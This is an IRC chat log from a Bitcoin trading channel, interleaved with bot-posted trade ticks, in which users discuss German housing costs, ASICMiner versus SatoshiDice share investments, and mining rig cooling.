15:47:02 total end of the world May 09 15:47:13 i think i will just pass on that house, really seems like more work than it is worth May 09 15:47:20 what do you think, thüringen is? May 09 15:48:03 [HAVELOCK] [ASICM] 1 @ 0.015475 BTC [-] May 09 15:48:04 [HAVELOCK] [ASICM] 845 @ 0.01547501 = 13.0764 BTC [+] May 09 15:48:06 [HAVELOCK] [ASICM] 20 @ 0.015475 = 0.3095 BTC [-] May 09 15:49:50 [BTCTC] [ASICMINER-PT] 1 @ 1.465 BTC [+] May 09 15:50:11 mircea_popescu: http://oi43.tinypic.com/9id66e.jpg May 09 15:50:31 its a portmanteau May 09 15:50:35 from aloof and lofty May 09 15:52:03 :-) May 09 15:53:02 [HAVELOCK] [ASICM] 100 @ 0.0158 = 1.58 BTC [+] May 09 15:53:14 andreas so does germany generally suck as a place to livei n ? May 09 15:54:06 [HAVELOCK] [ASICM] 150 @ 0.0158 = 2.37 BTC [+] May 09 15:54:28 dude! i found it omg! May 09 15:54:29 http://25.media.tumblr.com/b447b32d445ba19dba3d2a3dbd7fd86d/tumblr_mjelkmZX3G1qhv81zo2_r1_500.gif May 09 15:54:30 http://www.diepmans.com/index.php?action=angebotsdetails&angebotID=1231 May 09 15:54:38 I think, this is better... May 09 15:54:39 this is me when i go to conferences, press events etc. May 09 15:54:46 ...as an example... May 09 15:55:13 mircea_popescu: it's hard to compare for me, since I've never lived anywhere else.. May 09 15:55:24 well now, that you must change. May 09 15:55:40 but I think, you cannot say, that living in country x sucks... May 09 15:55:52 it depends where and how you live. May 09 15:55:56 andreas im shocked houses are so cheap in germany May 09 15:56:03 [HAVELOCK] [ASICM] 200 @ 0.01585 = 3.17 BTC [+] May 09 15:56:13 with enough money, you can have a decent live almost anywhere... May 09 15:56:37 Chaang-Noi: you have to consider the demographic problems here... May 09 15:56:39 well if you can't renovate your house May 09 15:56:42 35k euro is nothing for a house, or at least int he usa May 09 15:56:48 then no, it does suck, and its not a question of money. May 09 15:56:57 300k or os needed for a decent house in the usa May 09 15:57:02 [HAVELOCK] [ASICM] 41 @ 0.0159 = 0.6519 BTC [+] May 09 15:57:04 not enough kids, germans are getting fewer and fewer... May 09 15:57:21 and the young people go, where the work is. May 09 15:57:37 [MPEX] [S.MPOE] 7050 @ 0.00073496 = 5.1815 BTC [+] May 09 15:57:38 there are no companies in thüringen or hunsrück etc. May 09 15:57:59 i see May 09 15:57:59 so you cannot make a living there in most cases. May 09 15:58:03 [HAVELOCK] [ASICM] 48 @ 0.01595 = 0.7656 BTC [+] May 09 15:58:20 so they move into bigger towns, like cologne, munich etc. May 09 15:58:48 the old people stay in their villages, but they don't need internet etc. often. May 09 15:58:57 hmm, i am interested in getting some place in europe as a base to travel around, but no idea where, i think it wont be spain however... May 09 15:59:01 cads Chaang-Noi cheebydi coingenuity ColdHardMetal copumpkin Cory May 09 15:59:05 Chaang-Noi timisoara. May 09 15:59:09 so shops are closing etc. May 09 15:59:29 what does a decent flat cost there? im not sure i even want a house May 09 15:59:42 buying houses in cologne or munich is crazy expensive now... May 09 15:59:50 [BTCTC] [BASIC-MINING] 1 @ 0.400003 BTC [-] May 09 15:59:55 even renting an appartment is a huge problem.. May 09 15:59:57 Chaang-Noi why buy anyway ? you can just rent. May 09 16:00:02 id be intersted in timisoara May 09 16:00:07 starting from whatever, 200 a month. May 09 16:00:28 [BTCTC] [BASIC-MINING] 1 @ 0.400002 BTC [-] May 09 16:00:29 furnished? May 09 16:00:34 yeah May 09 16:00:40 [BTCTC] [BASIC-MINING] 1 @ 0.4 BTC [-] May 09 16:00:40 wellthats fine then May 09 16:00:56 i'm here specifically because it makes all of europe accessible. May 09 16:01:15 you can fly anywhere within an hour or two, the airport is 20 minutes away (from where i live) etc May 09 16:01:30 i might buy a car May 09 16:01:36 well... may be three hours to lisbon or moscow, but you get the idea. May 09 16:01:48 sure, west roads are ok. east a little iffy. May 09 16:02:24 idealy id hook up with a local who could assit me in traveling and the like, i only know english May 09 16:02:30 a bit of spanish May 09 16:02:57 http://www.bild.de/regional/hamburg/miete/preisexplosion-und-kein-ende-19656396.bild.html May 09 16:03:04 see Chaang-Noi? May 09 16:03:20 i see the photo May 09 16:03:24 Chaang-Noi so pick up some chick May 09 16:03:24 That's what it's looks like if a flat in hamburg is open for rent. May 09 16:03:26 but lack context May 09 16:03:29 ahh May 09 16:03:34 rent controlled? May 09 16:03:37 100 people want to take a look. May 09 16:04:04 [HAVELOCK] [ASICM] 100 @ 0.0155 = 1.55 BTC [-] May 09 16:04:05 because there are so few appartments available in the bigger towns here. May 09 16:04:42 yea, that's how he ended on deep hunsrueck May 09 16:04:47 *in May 09 16:05:03 [HAVELOCK] [ASICM] 10 @ 0.01595 = 0.1595 BTC [+] May 09 16:05:09 yeah, so apparently germany does suck to live in. May 09 16:05:22 people expecting you to accomodate them rather than bending over backwards for your comfort. May 09 16:05:34 hmm, honestly german girls are not really that hot for the most part May 09 16:05:37 nah,,,I wouldn't say that in general... May 09 16:05:49 the weather is not extreme... May 09 16:06:04 no storms, floods etc in general... May 09 16:06:16 [BTCTC] [ASICMINER-PT] 2 @ 1.46 = 2.92 BTC [-] May 09 16:06:20 summers in germany suck... always cloudy May 09 16:06:21 the whole infrastructure etc works... May 09 16:06:49 no electricity problems, water supply problems etc. May 09 16:06:52 yes carpathian basin is better clima-wise May 09 16:07:10 I can walk in 5 mins to the next hospital. May 09 16:07:10 andreas that is besides the point. who wants to live somewhere where "there are no apartments" ? May 09 16:07:16 fu, get cracking, build more. May 09 16:07:45 I said: in the middle of bigger towns, like munich,hamburg,berlin etc. May 09 16:07:54 you mean like, downtown ? May 09 16:08:10 in my hometown, you can find an appartment with no problems... May 09 16:08:21 a. then i misunderstood. obviously city centre is a limited supply. May 09 16:09:12 and you have to consider, that the economy still works quite well in germany. May 09 16:09:39 that's why so many young folks from spain etc want to come here... May 09 16:09:43 apparently finding a rent in vicinity of s-bahn outside city center is a problem, too May 09 16:10:04 yeah... May 09 16:10:39 even 20km outside of munich you'll have to pay > 500 euros to rent a small flat... May 09 16:11:31 hi everyone May 09 16:11:41 ohai May 09 16:11:42 Hi! May 09 16:11:50 davout: meteor is a success May 09 16:11:54 i love this framework May 09 16:12:04 [HAVELOCK] [ASICM] 6 @ 0.01585 = 0.0951 BTC [-] May 09 16:12:14 it looked awesome in the demo May 09 16:12:17 bids are now higher than asks http://blockchained.com/depth_mtgox_15d.png May 09 16:12:26 did you manage to make some sort of access control/user management easily ? May 09 16:12:28 nice kako :) May 09 16:13:02 wait higher? May 09 16:13:12 that chart could be set to anything :) May 09 16:15:15 you can check out the alpha version at buttonwood.btcshares.com May 09 16:15:38 and no, i haven't implemented user accounts yet, that is the next phase May 09 16:15:45 after that geolocation features May 09 16:15:55 MJR_ how did your central park orgy work out btw ? May 09 16:15:57 and then integrate with coinapult maybe May 09 16:16:13 not enough girls showed up May 09 16:16:13 mircea_popescu: it was union square park, and it went well May 09 16:16:19 kakobrekla:TRUE May 09 16:16:20 you have to start a blog May 09 16:16:23 i have May 09 16:16:24 or get some girl to blog for you May 09 16:16:31 yes but in the old sense of the term May 09 16:16:32 blog.btchshares.com May 09 16:16:37 here is how it went, here are pix, chronicle May 09 16:16:45 blogs were originally historical record of sorts. May 09 16:17:00 blog.btcshares.com i will have the youtube video up there soon, as well as pics and a full recap May 09 16:17:07 aha! coolness. May 09 16:17:16 link here the recap when you get it May 09 16:17:34 i definitely will, i've been pretty tired, between work and trying to get the app working May 09 16:17:45 ny times wrote about it though May 09 16:18:07 i saw. May 09 16:18:49 i think financial times should have an article soon, i'm supposed to grab drinks with that reporter this weekend May 09 16:18:50 what was this? May 09 16:18:59 read blog :) May 09 16:19:00 o also, http://trilema.com/2013/i-dont-no-biari-i-know-a-littel-java/ i take it everyone knows planeshift ? May 09 16:19:07 it says server not found May 09 16:20:00 Firefox can't find the server at blog.btchshares.com. is the fail just me? May 09 16:20:09 no, it's dns crapped out May 09 16:20:18 ahh May 09 16:20:18 mircea_popescu: are you a java coder? May 09 16:20:27 a try btcshares May 09 16:20:30 not btcsh May 09 16:20:31 then can some tell me what is going on? i lack context May 09 16:20:32 sorry that was wrong link May 09 16:20:36 andreas nope, i don't code. May 09 16:20:37 blog.btcshares.com May 09 16:20:37 [BTCTC] [ASICMINER-PT] 3 @ 1.46 = 4.38 BTC [-] May 09 16:20:49 ok thanks May 09 16:21:43 i meet a guy in bkk to trade fiat for btc May 09 16:21:55 and one other guy who wanted to as well but had communications fail May 09 16:22:52 I just hoped to find another Java coder... May 09 16:24:07 so AM mines 1000 btc a day now if id that math right May 09 16:26:32 [MPEX] [S.MPOE] 6800 @ 0.00073496 = 4.9977 BTC [+] May 09 16:26:34 [MPEX] [S.MPOE] 200 @ 0.00072822 = 0.1456 BTC [-] May 09 16:28:15 if they keep it up they might just top s.dice's best month May 09 16:28:40 [MPEX] [S.MPOE] 4321 @ 0.00073518 = 3.1767 BTC [+] May 09 16:28:42 [MPEX] [S.MPOE] 7971 @ 0.00073531 = 5.8612 BTC [+] May 09 16:28:47 [MPEX] [S.MPOE] 6604 @ 0.00073578 = 4.8591 BTC [+] May 09 16:28:48 [MPEX] [S.MPOE] 11700 @ 0.00073594 = 8.6105 BTC [+] May 09 16:28:50 [MPEX] [S.MPOE] 8400 @ 0.00073917 = 6.209 BTC [+] May 09 16:29:00 [MPEX] [S.MPOE] 2550 @ 0.00074042 = 1.8881 BTC [+] May 09 16:29:01 [MPEX] [S.MPOE] 18854 @ 0.00074251 = 13.9993 BTC [+] May 09 16:33:48 what is s dice best month? May 09 16:34:13 but anyway im surethis is the best ever stock from ipo just on dividends alone :) May 09 16:34:46 1500% stock price is pretty epic as well May 09 16:35:09 Chaang-Noi http://trilema.com/2013/mpex-one-year-of-dividends/ May 09 16:35:16 20`007 btc in jan May 09 16:35:30 ahh we will kill that May 09 16:36:05 pretty damn sure we will be over 35,000 in may May 09 16:36:47 and then we need to add in the 10,000 units for sale at 2 btc each May 09 16:37:29 with all we are adding and the like id not be shocked if tehy paid out 50k btc this month May 09 16:38:17 SELL: (CoinBr.iDiff-O):200 @ ฿0.11000000/ea wow someone is srs May 09 16:38:47 [MPEX] [O.USD.C101T] 1000 @ 0.15178078 = 151.7808 BTC [-] May 09 16:38:50 [MPEX] [O.USD.C098T] 1000 @ 0.15970416 = 159.7042 BTC [-] May 09 16:39:12 jurov isthat 11mn diff ? May 09 16:39:20 so good buys ridhgt now are sdice and asicminer May 09 16:39:27 mircea_popescu: yes. on may 15. May 09 16:39:34 might happen May 09 16:40:00 mp likes s dice, i dont, i like am but mp does not May 09 16:40:11 they actually need 0.5-0.9% more than that,. to recoup bf fees May 09 16:40:16 s.mpoe to rule them all! May 09 16:40:23 you wish :) May 09 16:40:38 Chaang-Noi i think atm by mkt cap its > s.dice and am together mwahaha May 09 16:40:52 mkt cap means shit to me May 09 16:41:01 pretty much the only metric i care about. May 09 16:41:10 threw some more iDiff-Os for 0.115 in, we'll see May 09 16:41:16 am is growing fast, s dice is falling fast May 09 16:41:22 lets see where we are in 6 months May 09 16:41:37 in 6 months we will be at the realisation that am is a mining stock, and consequently it's capped. May 09 16:41:42 erik is still making branding and mktg mistakes May 09 16:41:48 and mp AM has [aid bak the ipo prioce like 3 times. s dice has not even once yet May 09 16:41:48 won't take 6months either, 2 will be plenty. May 09 16:42:02 Chaang-Noi that is just a result of friedcat's woeful financial management. May 09 16:42:04 yeah 2 will be plenty May 09 16:42:16 he sold 50% of asicminer for 20k btc worth like 150k usd May 09 16:42:26 yeah, he needed 150k May 09 16:42:27 eric sold 10% of sdice for ~40k btc, worth like whatever, 4mn May 09 16:42:35 this is why people with a clue list on mpex. May 09 16:42:42 lol May 09 16:42:46 mp, the problem with those stats May 09 16:42:53 is they have nothing to do with the actual business May 09 16:43:02 ThickAsThieves tell you what. as an entrepreneur May 09 16:43:05 just the operator's front loaded income May 09 16:43:11 would you rather sell half your business for 0.15 or 10% of it for 4 ? May 09 16:43:17 long term am is going to kill s dice as an investment:) no doubt May 09 16:43:22 thats not the argument May 09 16:43:24 it ias. May 09 16:43:29 because only an idiot will take the worse deal. May 09 16:43:29 you arguing for an individual May 09 16:43:35 not a business May 09 16:43:40 and this means deals select : idiots there, sane people here. May 09 16:43:46 friedcat was late int he game, his company was a long shot... s dice was already established May 09 16:43:47 friedcat is seizing the moment May 09 16:43:57 erik is seizing hooker's asses May 09 16:44:03 nah. his time to seize the moment was when the girl said May 09 16:44:32 there's no reason am's tech lead will stay more than few months May 09 16:44:33 actually erik is engaged to this girl he;'s beeb with for what, 7-8 years now ? May 09 16:44:37 mp, so you think erik is managing his business better? May 09 16:44:53 ThickAsThieves no, i think he's just not as financially clueless as friedcat. May 09 16:44:53 as in, currently May 09 16:44:58 jurov in 2 months we should have 200 th or more bfl cant get close tothat May 09 16:45:08 the hard working farmer who didn't understand banks ended up poorer than the lazy guy who never worked. May 09 16:45:21 so on one hand erik is better at making money for himself, and the other friedcat is running his business better May 09 16:45:30 not quite. May 09 16:45:34 like apple vs google May 09 16:45:43 friedcat is quite apt at preventing his investors from realising their risk premiums May 09 16:45:48 google is much more agile May 09 16:45:51 erik is just getting a fair deal. May 09 16:45:51 as a share holder im happy with friedcat and would be pissed at eric, but i never bought in cuz i thought eric sold too high May 09 16:46:06 i think erik sold to a bunch of suckers :) May 09 16:46:13 Chaang-Noi well ya, but you're not exactly famed for having a clue so. May 09 16:46:22 lol May 09 16:46:42 selling for a right price != selling to a bunch of suckers. May 09 16:46:46 i think you have to decide which merits matter now May 09 16:46:47 erik did what was best for him, but in the long run i bet people who trusted him dont make their money back May 09 16:46:51 it's a simple matter of you trying to make your shoestring into fabled riches. May 09 16:46:55 this is not how economy works. May 09 16:47:19 how do you know that friedct isnt already thinking 10 steps ahead? May 09 16:47:22 [BTCTC] [BASIC-MINING] 1 @ 0.429792 BTC [+] May 09 16:47:22 he's not stupid May 09 16:47:32 and in general, there's always going to be this wild eyed "o, i will invest 100k into btc i expect 3475786895 billion" May 09 16:47:35 [BTCTC] [ASICMINER-PT] 5 @ 1.46 = 7.3 BTC [-] May 09 16:47:35 this is just immaturity. May 09 16:47:37 [BTCTC] [BASIC-MINING] 1 @ 0.429793 BTC [+] May 09 16:47:38 he was able to sell it, and that is great for him, im glad he did, but as some one who was looking to buy, i think he sold too high and the people who did give him money wont see it back, i could be wrong but i doubt it May 09 16:47:44 [BTCTC] [BASIC-MINING] 1 @ 0.4299 BTC [+] May 09 16:47:48 he is positioned to be the definition of all that is bitcoin mining May 09 16:47:53 Chaang-Noi and yet you don;t think 1.5 for am is too high. May 09 16:47:56 [BTCTC] [BASIC-MINING] 1 @ 0.43 BTC [+] May 09 16:48:02 you're pushing both ends of a strting here. May 09 16:48:04 erik is positioned to be the first bitcoin gambler May 09 16:48:18 [BTCTC] [BASIC-MINING] 1 @ 0.4399 BTC [+] May 09 16:48:21 ThickAsThieves mining is a quite different business from gambling. May 09 16:48:27 indeed May 09 16:48:28 you can make, AT MOST, X btc mining. May 09 16:48:30 [BTCTC] [BASIC-MINING] 2 @ 0.44 = 0.88 BTC [+] May 09 16:48:33 there's no cap to how much gambling can be worth. May 09 16:48:38 a casino irl goes for 10bn May 09 16:48:38 thats why he will diversify May 09 16:48:43 [BTCTC] [BASIC-MINING] 10 @ 0.45 = 4.5 BTC [+] May 09 16:48:48 [BTCTC] [BASIC-MINING] 1 @ 0.46 BTC [+] May 09 16:48:56 yeah but erik is working too slowly May 09 16:49:02 if you have the time and curiosity, read warren buffett's discussion of his woes in the textile trade. May 09 16:49:03 [BTCTC] [BASIC-MINING] 1 @ 0.48 BTC [+] May 09 16:49:12 as a beginning investor he kinda shared some of your mistaken ideas/assumptions. May 09 16:49:30 AM doesnt just mine May 09 16:49:33 they sell miners May 09 16:49:40 but the condensed moral is : it's never worth it to participate in a commodified business which is being actively researched May 09 16:49:44 and will probably remain market leader in both permanently May 09 16:49:56 [BTCTC] [TAT.ASICMINER] 12 @ 0.014675 = 0.1761 BTC [+] May 09 16:49:57 because you'll end up spending loads on new tech but your income is pretty much fixed (or even declining) May 09 16:50:12 sorry phone call May 09 16:50:18 ThickAsThieves the miners are only useful to mine. May 09 16:50:24 ie, to compete with their core bvusiness. May 09 16:50:26 [BTCTC] [ASICMINER-PT] 3 @ 1.46 = 4.38 BTC [-] May 09 16:50:27 just as soon as the fool May 09 16:50:30 's margins are out May 09 16:50:30 this also presumes there arent more ways he can diversify May 09 16:50:37 ThickAsThieves: you think am is like intel? May 09 16:50:38 (ie, people willing to overpay just to feel warmly involved) May 09 16:50:42 that business is dead. May 09 16:50:54 buying AM at 1.5 is not the same as buying at .1 i think AM was a long shot and might not have done as well as it did, but it did, and is turningout to be best btc investment evar May 09 16:51:04 Chaang-Noi only if you get to sell. May 09 16:51:10 you should have learned your lesson with pirate. May 09 16:51:16 mp i have sold some at 1.499 May 09 16:51:18 making bank is only good if you ever get to get it. May 09 16:51:26 what did i learn from pirate mp? May 09 16:51:41 also not that my position in AM is temporal May 09 16:51:46 that making 1.5 out of .1 is ONLY GOOD if you actually take the 1.5 May 09 16:51:47 I am selling them after all May 09 16:51:55 note* May 09 16:52:04 iv collected a lot more money from AM than i put in, and still hold a large amount May 09 16:52:16 which is exactly what's going on here, by refusing his investors liquidity friedcat is fucking them in teh wazoo May 09 16:52:25 and mp lol that you think i know what happened with my accounts with pirate :) May 09 16:52:29 course his investors are in general too clueless to realise, so he can manage to get away with it May 09 16:52:30 you* May 09 16:52:45 of course there is risk here May 09 16:52:49 like every investment May 09 16:52:54 ThickAsThieves that's not the contention. May 09 16:52:55 its not like SDICE is less risky May 09 16:53:03 most of his investers are happy with a 300% dividend and a 1500% stock price May 09 16:53:05 the contention is : am investors put in .1, took the risk, survived it. May 09 16:53:11 i think many investors are investing in the people May 09 16:53:13 [BTCTC] [BASIC-MINING] 3 @ 0.44 = 1.32 BTC [-] May 09 16:53:14 and now... they can't sell because 1 unit sold moves the market May 09 16:53:15 not just mining May 09 16:53:33 sdice liquidity is actually worse tham AM May 09 16:53:36 meanwhile clowns argue about how they're happy... well, no, they're stuck. May 09 16:53:39 mp AM is on like every exchange other than yours, and on some of them more than once May 09 16:53:47 it also sells otc May 09 16:54:02 AM is about the most liquid thing ever, May 09 16:54:11 Chaang-Noi every exchange except mpex = every US state except rhodes island May 09 16:54:11 i have a much harder time profiting from my sdice position May 09 16:54:25 lmao no way. May 09 16:54:32 thing is, if it was listed on yuor exchange i would never buy it, no account May 09 16:54:48 you;'d prolly dabble in passthroughs, May 09 16:54:55 which is adequate to your level anyway neh ? May 09 16:55:17 it's not fair to cloud the debate with insults May 09 16:55:27 as to "most liquid". most liquid means 10k btc a day. May 09 16:55:27 [BTCTC] [ASICMINER-PT] 1 @ 1.46 BTC [-] May 09 16:55:32 it doth not mean 5k a month or w/e May 09 16:55:32 its the only stock i hold at this point and its held direct with friedcat (other than some day trading with the pts) May 09 16:55:44 ThickAsThieves people need to understand their place, otherwise goats will climb in the tree. May 09 16:56:07 lol mp is just jelly AMis best stock ever and they want nothing to do with him May 09 16:56:09 AM volume has been about 500-1200btc a day for a while now May 09 16:56:20 and he is sad cuz s dice is crashing and that was the only stock he had :/ May 09 16:56:22 !ticker bt asicminer-pt May 09 16:56:25 [BTCT:ASICMINER-PT] 1D: 1.271 / 1.41753 / 1.49999 (1086 shares, 1539.4 BTC), 7D: 1.12 / 1.33266 / 1.49999 (2301 shares, 3066.5 BTC), 30D: 0.6269 / 1.14142 / 1.75 (7948 shares, 9072 BTC) May 09 16:56:28 http://webecoist.momtastic.com/2008/08/19/the-incredible-tree-climbing-goats-of-morocco/ <-- relevant May 09 16:56:37 certainly better than nothing. May 09 16:56:46 plus BF May 09 16:56:49 plus havelock May 09 16:56:51 plus otc May 09 16:56:55 plus my fractionals May 09 16:56:56 [MPEX] [O.USD.C101T] 1000 @ 0.15737871 = 157.3787 BTC [+] May 09 16:56:57 [MPEX] [O.USD.C098T] 1000 @ 0.16558317 = 165.5832 BTC [+] May 09 16:56:58 Chaang-Noi i own millions of s.mpoe. it went from 2 to 70 May 09 16:57:01 there are 5 or so pass throughs but most of the volume is OTc anyway May 09 16:57:04 [HAVELOCK] [ASICM] 2 @ 0.01565 = 0.0313 BTC [-] May 09 16:57:04 this is still better than asicminer. May 09 16:57:17 and this is why you need to be bitchslapped ocasionally, you forget reality in favour of your own fantasy May 09 16:57:24 but you cant sell 10% at 70 :) May 09 16:57:33 heh. May 09 16:57:49 lol, controling the price of your own stock on your own exchange, lol May 09 16:57:53 anyway, the moral of all this : amateur hour will keep us small. May 09 16:58:00 i do think caution is important with AM May 09 16:58:10 it's just about darned time everybody understands we;'re here to turn btc into a trillion dollar thing May 09 16:58:12 why TAT? May 09 16:58:20 but it's no easy argument saying they are not top 3 if not #1 btc biz May 09 16:58:21 not so that X dood gets to turn his civic in for a rover. May 09 16:58:36 ThickAsThieves they are in the top, somewhere between 2 and 3 atm. May 09 16:58:45 [BTCTC] [ASICMINER-PT] 2 @ 1.46 = 2.92 BTC [-] May 09 16:59:13 lol May 09 16:59:31 yeah, goats are pretty damn awesome May 09 16:59:45 we even shit oil May 09 16:59:46 The droppings of the goats contain the kernels of the seeds they consume which are, strangely enough, used by locals to press and grind into oil. May 09 17:01:54 i am shocked and amazed how rapidly all that got resolved. May 09 17:01:57 this chan may have a future. May 09 17:02:11 NOU! May 09 17:02:15 lol May 09 17:02:18 :) May 09 17:02:36 Goat thinks his droppings contain seeds of truth. May 09 17:02:57 lmao. somebody should make a droppings essence, market it as perfume May 09 17:03:05 Eau du Truth May 09 17:03:06 or maybe his goat contains seeds of Chaang-Noi May 09 17:03:15 ill be back in 2 months when AM has 200th and bfl is bankrupt and getting sued :) May 09 17:03:31 you'll be back tomorrow, stop lyin May 09 17:03:33 bfl is dead, there's no arguing that. May 09 17:03:50 http://theweek.com/article/index/232745/the-8-year-old-who-discovered-a-65000-piece-of-whale-poop <---relevent May 09 17:04:04 lol deadweasel bot keeping us appraised :D May 09 17:04:18 poop! May 09 17:04:57 [MPEX] [S.MPOE] 2500 @ 0.00072848 = 1.8212 BTC [-] May 09 17:05:18 look at that liquidity! May 09 17:06:03 [HAVELOCK] [ASICM] 80 @ 0.015 = 1.2 BTC [-] May 09 17:06:16 lol May 09 17:06:37 !ticker m s.mpoe May 09 17:06:38 [MPEX:S.MPOE] 1D: 0.00070757 / 0.00072405 / 0.00074251 (455958 shares, 330.14 BTC), 7D: 0.00068174 / 0.00071656 / 0.00076411 (1817468 shares, 1,302.34 BTC), 30D: 0.00064 / 0.00070525 / 0.00076528 (9997737 shares, 7,050.96 BTC) May 09 17:06:40 it actually is a pretty nice price for mpoe May 09 17:06:41 hater. May 09 17:07:43 i've not sold any in a while, the volume is lower but the price is on a definite uptrend May 09 17:07:46 which is mildly concerning May 09 17:08:04 uh oh May 09 17:08:11 mp is gonna squash the price May 09 17:08:20 its too dam high again May 09 17:08:38 nah, not planning to sell any for a while. May 09 17:09:10 btc price is stable... crazy May 09 17:09:25 let's rub this in May 09 17:09:36 ;;google btc not worth 100+ per stop buying May 09 17:09:37 People! Bitcoin is not worth 100+ dollars per. STOP BUYING! pe ...: ; a flaw in the 21 million BTC? - Bitcoin Forum: ; KRAKEN.COM - US Exchange Opens Beta : Bitcoin - Reddit: (1 more message) May 09 17:09:51 o look, above btc talk dun dun dun May 09 17:10:30 i sold at 134 230 and 255 then 135 again, i want 70 or 80 May 09 17:10:50 50 would be3 awesome, i want more coins May 09 17:10:58 still not paid back reptiliia May 09 17:10:59 i think lots of people do May 09 17:12:24 MPOE real depth: 15,507,117 shares bid 0.00039496 avg price 6124.63BTC total May 09 17:13:28 ThickAsThieves im not sure how trustworthy books are May 09 17:13:40 in general, not just mpoe, not just mpex, not even just financials. mtgox book is puffy too May 09 17:14:02 just figured it be interesting May 09 17:14:04 [HAVELOCK] [HIM] 2 @ 2.0599 = 4.1198 BTC [-] May 09 17:14:05 [HAVELOCK] [HIM] 2 @ 2.06 = 4.12 BTC [+] May 09 17:14:06 [HAVELOCK] [HIM] 1 @ 2.07 BTC [+] May 09 17:14:08 [HAVELOCK] [HIM] 1 @ 2.15 BTC [+] May 09 17:14:18 sell your HIM, buy ASICM! May 09 17:14:28 sell him buy her May 09 17:14:45 ThickAsThieves stfu. we want puts! May 09 17:15:32 incidentally, is him mostly a little mining, some cash on hand and bfl preorders ? May 09 17:15:52 make me an offer jurov May 09 17:16:03 [HAVELOCK] [ASICM] 70 @ 0.0151 = 1.057 BTC [+] May 09 17:16:09 bearing in mind my resources are limited May 09 17:16:55 HIM is 50% reinvest May 09 17:17:00 started with FPGAs May 09 17:17:13 BFLs on order May 09 17:17:36 it fell when BFL didnt deliver, and now has risen that BFL tricked everyone again May 09 17:18:16 how often are those dividends paid again? May 09 17:18:23 for HIM? May 09 17:18:25 weekly? May 09 17:18:30 [BTCTC] [TAT.ASICMINER] 9 @ 0.014675 = 0.1321 BTC [+] May 09 17:18:30 him-asicminer May 09 17:18:34 ? May 09 17:18:35 its a good value right now May 09 17:18:39 two different things May 09 17:18:47 yes asicminer May 09 17:19:05 HIM pays monthly May 09 17:19:08 AM is weekly May 09 17:19:15 with some extras thrown in sometimes May 09 17:19:26 thanks ill read up on those May 09 17:19:36 friedcat has hinted at quarterly payouts for larger side deals May 09 17:19:42 but i might be reading into it May 09 17:20:06 afaik he was just testing the waters to see if he can move to monthly. May 09 17:21:28 he was referring to AM's reporting of financials May 09 17:21:33 and included this May 09 17:21:35 "How much have we spent and are they spent properly? How much have we gain via non-public big selling contracts? Most companies do this on a quarterly or yearly basis. We could and will also do this." May 09 17:22:03 [HAVELOCK] [ASICM] 23 @ 0.01565 = 0.36 BTC [+] May 09 17:22:10 so it's a bit wishy washy May 09 17:23:11 him just got some block erruptors too May 09 17:24:27 oh yeah May 09 17:24:33 [MPEX] [S.MPOE] 295 @ 0.0007423 = 0.219 BTC [+] May 09 17:24:33 [MPEX] [S.MPOE] 4702 @ 0.00074251 = 3.4913 BTC [+] May 09 17:24:36 topace mentioned that yesterday May 09 17:24:43 like 10 or so blades May 09 17:24:47 at 13GH ea May 09 17:24:49 5 May 09 17:24:56 only 5? May 09 17:24:59 65 gh ya May 09 17:25:06 not so much, but better than nothing May 09 17:25:06 i could swear he said more May 09 17:25:08 scams! May 09 17:25:21 http://www.lightbox.ca/~james/photo-6.png May 09 17:25:28 ^^ thats them May 09 17:25:58 is that an emergency liquid-cooling pipe? May 09 17:26:06 nice cooling lol May 09 17:26:12 hehe May 09 17:26:44 oh it's a frame May 09 17:26:45 i see May 09 17:27:03 [HAVELOCK] [ASICM] 8 @ 0.01579 = 0.1263 BTC [+] May 09 17:27:06 yeah diy frame May 09 17:27:35 not bad May 09 17:27:40 much cleaner than my setup... May 09 17:28:29 Yeah, the PVC will not retain heat or be conductive, strong enough but still light weight. Good layout May 09 17:28:45 actually, its a bad choice because it melts May 09 17:28:51 and you don't want your structure melting May 09 17:28:54 it also burns May 09 17:28:57 but for an ad interim works May 09 17:29:03 [HAVELOCK] [ASICM] 5 @ 0.0151 = 0.0755 BTC [-] May 09 17:29:04 [HAVELOCK] [ASICM] 20 @ 0.015 = 0.3 BTC [-] May 09 17:29:05 [HAVELOCK] [ASICM] 10 @ 0.015 = 0.15 BTC [-] May 09 17:29:46 sorta ontopic : the weirdest thing i know of is this miner who encased the boards in clay May 09 17:29:56 has this sort of cabinet made out of clay. May 09 17:30:03 [HAVELOCK] [ASICM] 5 @ 0.01579 = 0.079 BTC [+] May 09 17:30:10 he won't let me take pictures, but the best part is he just waters it May 09 17:30:13 (the outside) May 09 17:30:18 heh May 09 17:30:28 humidifier May 09 17:30:39 apparently that thing can take out a shitton of heat that way May 09 17:30:54 provided it's not high temperature May 09 17:32:29 [BTCTC] [ASICMINER-PT] 1 @ 1.46 BTC [-] May 09 17:34:04 [HAVELOCK] [ASICM] 10 @ 0.01579 = 0.1579 BTC [+] May 09 17:35:44 [MPEX] [O.USD.C101T] 1000 @ 0.15730002 = 157.3 BTC [-] May 09 17:35:46 [MPEX] [O.USD.C098T] 1000 @ 0.16550667 = 165.5067 BTC [-] May 09 17:35:58 so basically... options trading now pretty much works on the short side May 09 17:37:28 10-13 ghash for $5K? doesnt seem very good May 09 17:38:55 [BTCTC] [ASICMINER-PT] 1 @ 1.46 BTC [-] May 09 17:39:53 [BTCTC] [ASICMINER-PT] 5 @ 1.46 = 7.3 BTC [-] May 09 17:43:46 [BTCTC] [TAT.ASICMINER] 14 @ 0.014779 = 0.2069 BTC [+] May 09 17:43:58 they should make miner with vaporizer :D May 09 17:45:43 myeah. May 09 17:48:46 [MPEX] [O.USD.C101T] 1000 @ 0.15198693 = 151.9869 BTC [-] May 09 17:48:46 [MPEX] [O.USD.C098T] 1000 @ 0.15992594 = 159.9259 BTC [-] May 09 17:50:38 [BTCTC] [ASICMINER-PT] 2 @ 1.46 = 2.92 BTC [-] May 09 17:50:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.014779 BTC [+] May 09 17:50:46 [BTCTC] [ASICMINER-PT] 3 @ 1.465 = 4.395 BTC [+] May 09 17:54:03 [HAVELOCK] [ASICM] 10 @ 0.0155 = 0.155 BTC [-] May 09 17:55:03 [HAVELOCK] [ASICM] 50 @ 0.0146 = 0.73 BTC [-] May 09 17:55:04 [HAVELOCK] [ASICM] 150 @ 0.01452 = 2.178 BTC [-] May 09 17:55:05 [HAVELOCK] [ASICM] 100 @ 0.01451 = 1.451 BTC [-] May 09 17:55:07 [HAVELOCK] [ASICM] 155 @ 0.01450003 = 2.2475 BTC [-] May 09 17:55:08 [HAVELOCK] [ASICM] 560 @ 0.01450002 = 8.12 BTC [-] May 09 17:55:09 